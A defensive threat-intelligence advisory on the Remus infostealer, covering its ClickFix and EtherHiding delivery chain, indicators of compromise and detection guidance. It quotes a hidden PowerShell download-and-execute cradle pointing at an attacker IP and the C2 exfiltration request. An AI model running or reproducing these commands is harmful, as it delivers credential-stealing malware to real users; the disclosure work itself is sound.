TLP:CLEAR Threat: Known bad · 10/10

Remus Stealer (WP-002) via ClickFix & EtherHiding

Advisory SL-ADV-2026-WP-001 v15.2 — delivery chain re-tooled; durable C2 anchor confirmed; native-core capability mapped from import surface
Author: Dispensight / SecureLeaf Contact: secureleaf.dispensight.com Published: 2026-09-02 Family: Remus (WP-002) Lure: hxxp://dorz[.]nl

Executive summary

A new wave of the WP-002 / Remus infostealer is being delivered through a compromised WordPress site (dorz[.]nl) that stages a ClickFix paste-and-run lure via a BSC-testnet EtherHiding contract. The chain terminates in a fileless native stealer core injected into a hollowed browser process, with a managed .NET collection component and RSA-wrapped HTTP exfiltration.

Versus prior waves, the delivery front-end was rebuilt (IExpress-SFX + AutoIt loader replacing the MZER/Donut branch), but the durable RSA-1024 C2 handshake key (dc4cb858…febfac6f, e=65537) is CONFIRMED — resolved in process memory across two independent detonations. Attribution is held at the infrastructure level; no named-group assertion.

1 · Kill chain

Compromised lure — dorz[.]nl (WordPress/Elementor)

Injected page pulls a stage from a blockchain contract. The host itself is a victim (splitcam: never blocklisted).

EtherHiding — BSC-testnet — T1102

Contract 0xae5d8eec…08034 (selector 0xe2179b8e), read via data-seed-prebsc-1-s1.binance.org, returns base64 JS appending the asseload.com widget.

ClickFix stager — asseload.com · T1204.004

aps.js chain-loads a/9f2b4d03635c.js (XOR key oipCQd0DIbeF) — fake Cloudflare verify: Win+R → Ctrl+V → OK, poisoning the clipboard.

PowerShell download-cradle — T1059.001

powershell -w h -c "iex((New-Object Net.WebClient).DownloadString('hxxp://193.221.200.66:4139/tools/soft/coms'))"

IExpress SFX → AutoIt loader — T1027

IntroductionChassis.exe drops legit AutoIt3.exe + packed Corpus.a3x; runs AutoIt3.exe Corpus.a3x.

Process hollowing — T1055.012

Native Remus core injected fileless into a hollowed browser process at 0x140000000 via SetThreadContext/WriteProcessMemory.

Collection — T1555.003 · T1005

Managed .NET component reads browser profile/credential stores and enumerates cryptocurrency wallet artifacts. Firefox profile access observed.

Exfiltration — T1071.001

POST /invoices to 209.38.82.72:9048 (cdire[.]shop), Host: github.com spoof. Body schema rotated between waves (access_token/debug → tag/exp/hwid).

Persistence — T1053.005

Task Scheduler COM API / at.exe invocation.

2 · Forensic confirmations & honest gaps

Durable RSA-1024 anchor — CONFIRMED. CAPI PUBLICKEYBLOB (modulus SHA-256 dc4cb858…febfac6f, e=65537) resolved in the PowerShell stage memory across two independent detonations. It is runtime-resolved, never present in the static a3x — which is why on-disk/wire hunts came up empty.
New C2 confirmed independently. cdire[.]shop → 209.38.82.72:9048, resolved directly from the packet capture (not only the sandbox report). Same /invoices, same github.com host-spoof.
Loader front-end diverged. No MZER prologue; SFX imphash 4cea7ae8… matches neither prior WP-002 anchor. Delivery was rebuilt while the terminal family and C2 key held.
Target list is runtime-keyed by design — not merely un-dumped. The wallet/browser target list does not persist in cleartext in memory: it is AES-decrypted at use-time and handled through an OLEAUT32 BSTR allocation (allocate → use → free), so it never exists as a durable contiguous string. This matches the runtime-keyed target-list sealing first documented in v14.x (wire payload RSA-1024-wrapped; target list runtime-keyed AES). Static recovery is not expected; capability is bounded to the import surface and host telemetry below. Re-confirmation across waves, not a first observation.

3 · Native-core capability (from import surface)

The terminal native core (region 0x140000000, PID 5528) was disassembled defensively. Its resolved import address table bounds what the payload can do — without any reconstruction of the runtime-keyed logic. All 36 imports below are confirmed present in the dumped image across six modules (KERNEL32 · ole32 · USER32 · ADVAPI32 · GDI32 · OLEAUT32).

CapabilityImportsATT&CK
Screen captureBitBlt · CreateCompatibleBitmap · CreateCompatibleDC · GetDIBits · GetWindowDC · GetDC · GetObjectW · SelectObjectT1113
Hidden desktop (invisible interaction)CreateDesktopW · OpenDesktopW · CloseDesktop · EnumDisplaySettingsWT1564
COM / OLE automation (config & BSTR handling)CoCreateInstance · CoInitializeSecurity · CoSetProxyBlanket · CoInitialize · CoUninitializeT1559.001
Host / user fingerprint (→ exfil hwid)GetComputerNameA · GetComputerNameExA · GetUserNameA · GetKeyboardLayout · GetKeyboardLayoutNameWT1082 · T1033
Privilege / token inspectionLookupPrivilegeValueWT1134
Clipboard / global-memory handlingGlobalLock · GlobalUnlock · LocalFreeT1115
Anti-analysis: the native core is a self-modifying, manually-mapped image (header region hidden per IDA), with a fragmented .text (function chunks at 0x140001CDE, 0x1400026B3), a byte-wise decode loop (movzx / test / jz), and a mid-instruction jmp — characteristic of a runtime unpacker stub, not the resolved collector.

4 · Indicators of compromise

Network

TypeValueRoleHandling
domaincdire[.]shopRemus C2 (new)block
ipv4209.38.82.72:9048Remus C2 (2 waves)block
domainasseload[.]comClickFix stagerblock
ipv4193.221.200.66:4139PS dropper + ZIP hostblock
eth0xae5d8eec…08034EtherHiding contracttrack
urlhxxp://dorz[.]nl/Compromised lureVICTIM — notify, do not block

Host / file

TypeValueNote
sha2562a1d78fb…9787680IntroductionChassis.exe (IExpress SFX)
sha25674a517b6…7a4a67fCorpus.a3x (compiled AutoIt, packed)
sha25692c6531a…733f9f45AutoIt3.exe (legit interpreter, abused LOLBin)
sha256 (.text)eba3f014…4c138Terminal native core — fileless @0x140000000; whole-image hash mutates, use .text
modulusdc4cb858…febfac6fDurable RSA-1024 C2 key (e=65537), runtime-resolved

5 · Detection

Full rulesets ship alongside this advisory: YARA (SL-ADV-2026-WP-001-V15.yar, 7 rules), Sigma (SL-ADV-2026-WP-001-V15.sigma.yml, 8 rules), and a STIX 2.1 bundle (SL-ADV-2026-WP-001-V15.stix.json, 47 objects with kill-chain relationships).

Highest-value discriminator

The exfil beacon spoofs Host: github.com while connecting to a non-GitHub IP — that mismatch is the cleanest network signal:

POST /invoices HTTP/1.1
Host: github.com          <-- spoofed; destination is 209.38.82.72 / cdire.shop
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/117.0.0.0
Content-Type: application/x-www-form-urlencoded

tag=<hex>&exp=<epoch>&hwid=<hex>    (variant-2; variant-1 = access_token=<guid>&debug=<hex>)

6 · Recommended actions

PriorityAction
nowBlock C2 209.38.82.72, cdire[.]shop, stager asseload[.]com, payload host 193.221.200.66.
nowAlert on POST /invoices + spoofed Host: github.com to non-GitHub destinations.
soonHunt powershell -w h … DownloadString cradles and AutoIt3.exe injecting into browsers.
coordNotify dorz[.]nl host/registrar (.nl abuse) — victim cleanup, not blocklisting.

Attribution stance: infrastructure-level only; no named-group or nation-state assertion. Splitcam rule: compromised lure/victim hosts are never added to blocklists. Provenance: all indicators reconstructed from packet captures and memory dumps by Dispensight/SecureLeaf; the durable-key confirmation and new C2 were verified against the raw captures, not solely the sandbox report. The runtime-keyed target-list sealing and DUI70/OLEAUT capability profile are re-confirmations of findings first established in v14.x, not first observations.

SL-ADV-2026-WP-001 v15.2 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com